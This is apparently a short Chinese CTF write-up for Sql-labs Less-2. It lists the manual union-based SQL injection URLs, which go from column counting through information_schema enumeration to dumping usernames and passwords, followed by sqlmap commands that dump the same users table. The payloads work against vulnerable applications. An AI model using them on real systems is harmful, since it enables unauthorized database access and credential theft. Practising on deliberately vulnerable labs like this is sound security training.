【ctf系列】Sql-labs 第02关:GET -Error based -Integer based

命令

方法1:手工注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
http://x.x.x.x:x/Less-2/?id=1
http://x.x.x.x:x/Less-2/?id=2

http://x.x.x.x:x/Less-2/?id=1 and 1=1
http://x.x.x.x:x/Less-2/?id=1 and 1=2

http://x.x.x.x:x/Less-2/?id=1 order by 1 
http://x.x.x.x:x/Less-2/?id=1 order by 3 
http://x.x.x.x:x/Less-2/?id=1 order by 4

http://x.x.x.x:x/Less-2/?id=-1 union select 1,2,3
http://x.x.x.x:x/Less-2/?id=-1 union select 1,2,database()
http://x.x.x.x:x/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables
http://x.x.x.x:x/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
http://x.x.x.x:x/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'
http://x.x.x.x:x/Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from users

方法2:sqlmap工具 同第01关

1
2
3
4
sqlmap -u http://x.x.x.x:x/Less-1/?id=1 --dbs
sqlmap -u http://x.x.x.x:x/Less-1/?id=1 -D security --tables
sqlmap -u http://x.x.x.x:x/Less-1/?id=1 -D security -T users --columns
sqlmap -u http://x.x.x.x:x/Less-1/?id=1 -D security -T users -C password,id,username --dump
ctf
【ctf系列】Sql-labs 第02关:GET -Error based -Integer based
http://example.com/2023/08/08/ctf/【ctf系列】Sql-labs 第02关:GET -Error based -Integer based/
作者
ningan123
发布于
2023年8月8日
许可协议